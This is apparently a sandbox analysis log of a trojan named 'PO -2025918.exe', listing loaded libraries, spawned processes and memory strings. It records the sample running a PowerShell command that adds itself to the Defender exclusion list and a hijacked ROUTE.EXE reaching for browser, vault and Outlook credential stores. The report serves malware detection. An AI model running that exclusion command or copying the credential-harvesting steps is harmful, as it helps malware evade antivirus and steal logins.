                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 03305130 appears 58 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 032BB970 appears 262 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 0334F290 appears 103 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 03317E54 appears 107 times
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 0333EA12 appears 86 times
                      Source: PO -2025918.exe, 00000000.00000002.1864286596.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000000.00000002.1865271514.0000000002751000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000000.00000002.1865271514.00000000027A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000000.00000002.1894470547.000000000737C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXE vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000000.00000002.1870856601.0000000003759000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000000.00000002.1895191077.0000000008C50000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000000.00000002.1892212304.0000000007040000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000000.00000000.1692063844.0000000000450000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameobgh.exe< vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000004.00000002.2125457765.0000000001C8D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameroute.exej% vs PO -2025918.exe
                      Source: PO -2025918.exe, 00000004.00000002.2124918917.000000000171A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameroute.exej% vs PO -2025918.exe
                      Source: PO -2025918.exe | Binary or memory string: OriginalFilenameobgh.exe< vs PO -2025918.exe
                      Source: PO -2025918.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: PO -2025918.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@10/7@11/8
                      Source: C:\Users\user\Desktop\PO -2025918.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO -2025918.exe.log
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1860:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xct4qmlf.z35.ps1
                      Source: PO -2025918.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\PO -2025918.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\PO -2025918.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2306045699.0000000002E88000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: PO -2025918.exe | Virustotal: Detection: 52%
                      Source: PO -2025918.exe | ReversingLabs: Detection: 57%
                      Source: unknown | Process created: C:\Users\user\Desktop\PO -2025918.exe "C:\Users\user\Desktop\PO -2025918.exe"
                      Source: C:\Users\user\Desktop\PO -2025918.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe"
                      Source: C:\Users\user\Desktop\PO -2025918.exe | Process created: C:\Users\user\Desktop\PO -2025918.exe "C:\Users\user\Desktop\PO -2025918.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe | Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
                      Source: C:\Windows\SysWOW64\ROUTE.EXE | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\PO -2025918.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: PO -2025918.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: PO -2025918.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: route.pdb source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540473379.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nWrCyfejRZk.exe, 00000008.00000002.3539862270.000000000080E000.00000002.00000001.01000000.0000000C.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3539737023.000000000080E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: PO -2025918.exe, 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2125155011.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2127202503.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: PO -2025918.exe, PO -2025918.exe, 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000009.00000003.2125155011.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2127202503.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: route.pdbGCTL source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540473379.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_07074236 push dword ptr [ebp+01h]; ret 0_2_0707423B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_070879C0 push edx; iretd 0_2_07087AE6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_070876D1 push ebx; iretd 0_2_070876DE
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0708FCA0 push cs; iretd 0_2_0708FCAE
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_07087B01 push esp; iretd 0_2_07087B0E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0708E328 push esp; iretd 0_2_0708E336
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0708E3C6 push ebx; iretd 0_2_0708E3D6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_0708826A push cs; iretd 0_2_0708827E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_070882AA push cs; iretd 0_2_070882B6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_07087AA6 push edx; iretd 0_2_07087AE6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_07088101 push A807062Fh; iretd 0_2_0708810D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 0_2_070839F2 push esp; iretd 0_2_070839F3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_00411A5A push edi; iretd 4_2_00411A5B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_00415A13 push esp; ret 4_2_00415A1E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_0041623C push edi; retf 4_2_0041623D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_0040235F push ds; ret 4_2_0040238E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_004143E3 push ebx; ret 4_2_00414440
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_004143E3 push edi; retf 4_2_00414477
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_0041645E push eax; iretd 4_2_00416462
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_0041446E push edi; retf 4_2_00414477
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_00414436 push ebx; ret 4_2_00414440
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_004034F0 push eax; ret 4_2_004034F2
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_00404616 push edx; ret 4_2_00404617
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_00418EC4 push eax; retf 4_2_00418EC5
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_004187CA push esi; ret 4_2_004187D1
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B6225F pushad ; ret 4_2_01B627F9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B627FA pushad ; ret 4_2_01B627F9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B909AD push ecx; mov dword ptr [esp], ecx4_2_01B909B6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B6283D push eax; iretd 4_2_01B62858
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B61368 push eax; iretd 4_2_01B61369
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_0329225F pushad ; ret 9_2_032927F9
                      Source: PO -2025918.exeStatic PE information: section name: .text entropy: 7.75594454439522

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
